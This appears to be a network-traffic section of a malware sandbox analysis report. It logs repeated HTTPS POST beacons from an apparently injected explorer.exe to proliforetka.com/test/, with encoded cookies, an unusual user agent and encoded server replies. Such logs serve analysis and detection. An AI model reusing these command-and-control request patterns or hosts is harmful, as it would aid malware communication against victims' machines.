                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFdl8%2FnY1c2obO7rAG%2B%2Fat4huN8g0rVvwp2rn%2B66WQdVfa5T%2F6eocPqxYKzPDjOXSWDt2M7NwLOm7HuF1vKB%2BFAsawdOpwiGtb73vhpUJ%2Bq9SxMNoguMtmJTdf2j5Du6XuyC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38756efcc132ca-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2009&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1426477&cwnd=221&unsent_bytes=0&cid=59ac9bdc4a7dc546&ts=757&x=0"
                                                                                                                                2024-12-17 16:58:35 UTC347INData Raw: 31 35 34 0d 0a 6d 46 39 73 4a 73 52 4f 76 31 66 33 4c 5a 4d 37 67 54 56 48 47 33 37 4d 68 75 70 53 71 55 36 7a 48 55 6c 59 68 48 58 66 44 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 49 58 39 68 38 67 50 51 6a 36 64 47 41 6f 54 41 44 30 50 5a 45 68 62 72 5a 53 7a 35 34 63 75 66 65 51 37 30 61 37 54 39 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 50 48 69 44 6f 41 6d 50 70 56 51 37 42 36 53 4d 6b 2f 55 74 73 75 72 4e 30 2b 67 4d 74 73 74 77 43 79 4a 61 2f 78 73 65 4c 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mF9sJsROv1f3LZM7gTVHG37MhupSqU6zHUlYhHXfDQLp5exDOPARyFkPbnOTIX9h8gPQj6dGAoTAD0PZEhbrZSz54cufeQ70a7T9Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TPHiDoAmPpVQ7B6SMk/UtsurN0+gMtstwCyJa/xseLBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.650036172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:36 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:37 UTC815INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjzW4cLPZsmr40gVxZaEO7tZaDsbnmsOz2KYCwxQ5Vfve1To7p1UM2hlGkaXIJ2AmYs2h%2FFMVZ0tzmvg7nbbOO%2Bxs1WGBY%2BC2VKh%2BlnPEBCxLMe%2BpVuoIZtsOYGDNlGHemVQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38757be8bc42e1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1604&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1808049&cwnd=232&unsent_bytes=0&cid=0be26757fa7cb2bd&ts=803&x=0"
                                                                                                                                2024-12-17 16:58:37 UTC343INData Raw: 31 35 30 0d 0a 6c 6c 74 72 4b 63 5a 4a 76 31 66 32 4a 35 77 31 69 54 64 4c 47 33 44 4f 68 2b 78 63 72 6b 43 7a 47 45 42 59 68 48 48 62 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 36 55 4a 33 39 76 38 77 36 34 35 61 68 50 44 34 50 47 43 67 2b 57 47 78 62 6e 61 79 43 54 35 61 79 64 63 51 6e 2f 61 50 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 54 42 54 66 50 74 41 49 4e 50 4f 66 35 52 36 68 61 52 4d 51 58 52 2f 63 6d 73 50 55 79 6c 56 4e 6c 46 77 69 6d 4b 62 76 6b 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 7a 4e 76
                                                                                                                                Data Ascii: 150lltrKcZJv1f2J5w1iTdLG3DOh+xcrkCzGEBYhHHbSXPurONKPOMWz0dOaU6UJ39v8w645ahPD4PGCg+WGxbnayCT5aydcQn/aP/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxTBTfPtAINPOf5R6haRMQXR/cmsPUylVNlFwimKbvkoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgzNv
                                                                                                                                2024-12-17 16:58:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.650037172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:38 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:39 UTC813INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rb%2BdR9KoFjWhp7Ev9pgXaXHXvFw5QCzZf5NbzS0CrFeM1dKhrgyKAGxvMnPL0NqbU%2B%2B516oUNFQiPkL0u523qKJaTlCLFayN%2FstYzgpkl0VawOdfVToSpGR37D5w4GUML%2FJH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387589187441b5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1778&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1541710&cwnd=207&unsent_bytes=0&cid=942357b7b1bd4c31&ts=795&x=0"
                                                                                                                                2024-12-17 16:58:39 UTC347INData Raw: 31 35 34 0d 0a 6e 31 70 6e 4a 73 42 4a 75 31 66 78 49 35 77 37 68 54 64 48 47 33 33 4d 69 4f 74 54 6f 55 69 7a 47 55 42 66 68 48 66 55 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 4c 6e 31 71 39 41 54 66 6a 36 78 43 41 34 54 45 44 45 44 5a 48 68 6a 6a 5a 79 6a 34 6a 36 32 59 63 51 33 38 62 4c 71 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 43 52 76 54 74 41 6f 42 50 50 50 6c 53 36 68 57 53 4d 77 58 59 2b 4d 71 6f 4e 30 4b 69 56 4e 4a 44 77 43 71 45 61 2f 77 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 7a 4e 66
                                                                                                                                Data Ascii: 154n1pnJsBJu1fxI5w7hTdHG33MiOtToUizGUBfhHfUAALp5exDOPARyFkPbnOVLn1q9ATfj6xCA4TEDEDZHhjjZyj4j62YcQ38bLqyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvCRvTtAoBPPPlS6hWSMwXY+MqoN0KiVNJDwCqEa/woQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgzNf
                                                                                                                                2024-12-17 16:58:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                42192.168.2.650038172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:40 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:41 UTC814INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B432KrMtjjndcduCuBCMpxmVi5OCS3dPjtZgC%2BskF67nb3QoV3InhyqXWFq%2F62mNv6OwRuX9E7lqKNd0vZqyjI8uV80PPtE6gjtYiJ%2FDA9F%2FjQVCrm%2BfFza59hRd6S4GOP5p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387595baf643eb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2633&min_rtt=2121&rtt_var=1161&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1376709&cwnd=183&unsent_bytes=0&cid=a93ac95b4f5e70ba&ts=799&x=0"
                                                                                                                                2024-12-17 16:58:41 UTC343INData Raw: 31 35 30 0d 0a 6e 46 4e 74 4a 63 74 4e 31 54 76 30 4a 35 63 7a 68 6a 4d 50 56 48 7a 4e 67 75 35 55 72 53 66 66 48 30 56 61 68 6e 6e 56 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 2b 51 49 33 31 68 38 47 6e 55 35 36 64 48 42 34 48 49 51 6b 75 63 47 78 54 72 5a 45 62 39 34 61 53 61 66 41 6a 38 4a 59 37 45 45 36 68 36 76 71 6d 7a 55 2f 6c 2b 56 79 68 62 4f 6c 4f 73 54 56 57 52 6d 68 59 56 50 4c 58 33 5a 6a 44 79 53 6a 36 67 50 6b 4a 4a 2f 45 53 37 62 78 6e 47 51 66 66 68 42 65 6f 6b 50 50 74 53 37 52 43 51 66 6b 48 56 2b 73 6d 6d 4f 6b 37 4f 4f 64 78 47 78 53 2b 4d 61 4c 4a 5a 52 4a 6b 63 33 4d 61 4a 39 44 6f 4a 32 39 76 41 55 71 79 46 7a 50 31 46 6a 7a 62 6d 48 72 66 6d 4b 61 72 41 59 64 68 74 30 74 59 69 50 6c 4e 64 67 32 61 6b 46 6c 59 79 4e 2f
                                                                                                                                Data Ascii: 150nFNtJctN1Tv0J5czhjMPVHzNgu5UrSffH0VahnnVSXPurONKPOMWz0dOaU+QI31h8GnU56dHB4HIQkucGxTrZEb94aSafAj8JY7EE6h6vqmzU/l+VyhbOlOsTVWRmhYVPLX3ZjDySj6gPkJJ/ES7bxnGQffhBeokPPtS7RCQfkHV+smmOk7OOdxGxS+MaLJZRJkc3MaJ9DoJ29vAUqyFzP1FjzbmHrfmKarAYdht0tYiPlNdg2akFlYyN/
                                                                                                                                2024-12-17 16:58:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                43192.168.2.650039172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:42 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:43 UTC811INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vx5B823ZaA%2BtLcTS7KergGzu2ip6YlEYmf9e%2FrmeUAmy4y0rB0l6VwzG7%2FRtM1SOpyKcX83YToJc0h5zmGfK08G5HwLJedYHotwbTIlh6N2UhV92kMMrfz0Oa7oVfFC%2BPLi5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875a47a8f43d0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2559&min_rtt=2504&rtt_var=978&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1166134&cwnd=181&unsent_bytes=0&cid=fc046d0208daa25b&ts=798&x=0"
                                                                                                                                2024-12-17 16:58:43 UTC347INData Raw: 31 35 34 0d 0a 6c 31 6c 71 4b 4d 74 4c 75 6c 66 79 4a 4a 51 79 67 7a 74 47 47 33 76 4a 67 2b 35 64 72 55 6d 7a 47 30 64 64 67 48 6a 5a 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 57 4a 58 78 6f 39 67 37 54 6a 36 31 43 44 6f 76 47 42 30 58 5a 47 78 66 71 5a 79 2f 2b 35 73 75 61 65 77 72 34 62 37 72 39 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 66 48 69 41 59 63 6d 56 50 4a 55 37 68 53 52 4f 30 2b 63 2f 63 32 6e 50 45 32 69 4d 37 52 48 78 53 6d 50 59 2f 68 69 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 50
                                                                                                                                Data Ascii: 154l1lqKMtLulfyJJQygztGG3vJg+5drUmzG0ddgHjZAALp5exDOPARyFkPbnOWJXxo9g7Tj61CDovGB0XZGxfqZy/+5suaewr4b7r9Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TfHiAYcmVPJU7hSRO0+c/c2nPE2iM7RHxSmPY/hiMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMP
                                                                                                                                2024-12-17 16:58:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                44192.168.2.650040172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:45 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:46 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WA7UarMiYwRX5pNB1HhKmTcjIlsZFXdwJVGybHGnipJ2fZXGW1h3Q1k52G%2Fh7tsrAO3lkK4mXc1POmPXvoP1kJbqtt62kweygMaP%2B0rEDkX5JBOgkcr54Yna3HBnK4sWHrTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875b75a150fa3-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=50026&min_rtt=1748&rtt_var=29296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1670480&cwnd=222&unsent_bytes=0&cid=a8f8cca221cb75ed&ts=925&x=0"
                                                                                                                                2024-12-17 16:58:46 UTC347INData Raw: 31 35 34 0d 0a 6e 31 70 72 4b 4d 4a 46 76 46 66 38 4c 5a 77 78 67 7a 42 41 47 33 33 44 69 65 31 52 72 30 79 7a 48 55 52 61 67 48 48 55 41 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 53 4a 6e 31 72 39 41 4c 54 6a 36 64 47 41 34 58 45 42 6b 62 5a 45 68 4c 6e 5a 69 7a 35 34 4d 75 61 65 51 7a 34 62 4c 76 2b 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 52 66 76 68 42 34 49 6e 56 50 4e 58 36 68 57 51 4e 6b 47 63 2b 63 69 74 4f 6b 4b 6f 50 72 52 42 78 69 71 45 62 2f 6c 6d 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 2f
                                                                                                                                Data Ascii: 154n1prKMJFvFf8LZwxgzBAG33Die1Rr0yzHURagHHUAgLp5exDOPARyFkPbnOSJn1r9ALTj6dGA4XEBkbZEhLnZiz54MuaeQz4bLv+Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9RfvhB4InVPNX6hWQNkGc+citOkKoPrRBxiqEb/lmMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IM/
                                                                                                                                2024-12-17 16:58:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                45192.168.2.650041172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:48 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:49 UTC821INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qm%2Fj714HjK%2BkWaOsfg4JPow%2F2aLfyHsYH9GO3IdjNYS%2FEpblXPF%2BieHR3rfX03jiFjKnIpqzm5OsrLWIm5HnEF%2FQUegj8MwDLQ4tj0hpIytWVij7AR%2F6M648%2FYiMszcdr%2Fps"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875c75f7a8cbd-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2319&rtt_var=877&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1242553&cwnd=180&unsent_bytes=0&cid=81558de52bcf120b&ts=758&x=0"
                                                                                                                                2024-12-17 16:58:49 UTC343INData Raw: 31 35 30 0d 0a 6c 6c 68 71 4a 38 64 45 76 46 66 78 4a 4a 77 77 68 44 52 41 47 33 76 4d 67 65 70 55 6f 45 6d 7a 47 45 5a 5a 68 33 6a 65 41 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 49 58 70 75 39 77 54 58 6a 36 5a 48 41 34 66 47 42 6b 44 5a 48 52 54 6e 59 69 48 39 35 38 75 62 63 41 48 35 61 62 58 2f 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 76 66 69 42 34 77 6d 4f 4a 56 53 36 52 53 58 4e 55 7a 57 74 73 4f 74 4f 6b 6d 6d 4f 64 34 74 78 53 6d 4d 59 76 6f 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 33 4d 2f
                                                                                                                                Data Ascii: 150llhqJ8dEvFfxJJwwhDRAG3vMgepUoEmzGEZZh3jeAgLp5exDOPARyFkPbnOVIXpu9wTXj6ZHA4fGBkDZHRTnYiH958ubcAH5abX/Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QvfiB4wmOJVS6RSXNUzWtsOtOkmmOd4txSmMYvooQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg3M/
                                                                                                                                2024-12-17 16:58:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                46192.168.2.650042172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:50 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJ4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:51 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSJhlfWvkTc%2BKyPbmwYb3ix%2BQYSOOWCgrsgj%2FLZkdgghRLXajlD8DzdUFymsagzxIjlKTp0bUkv3Ov4tVqQDNpaO6rwOhtxoBx4sP5gIKS194Y6tSV1hhxRldYhuWNysa4JZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875d56d07d124-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
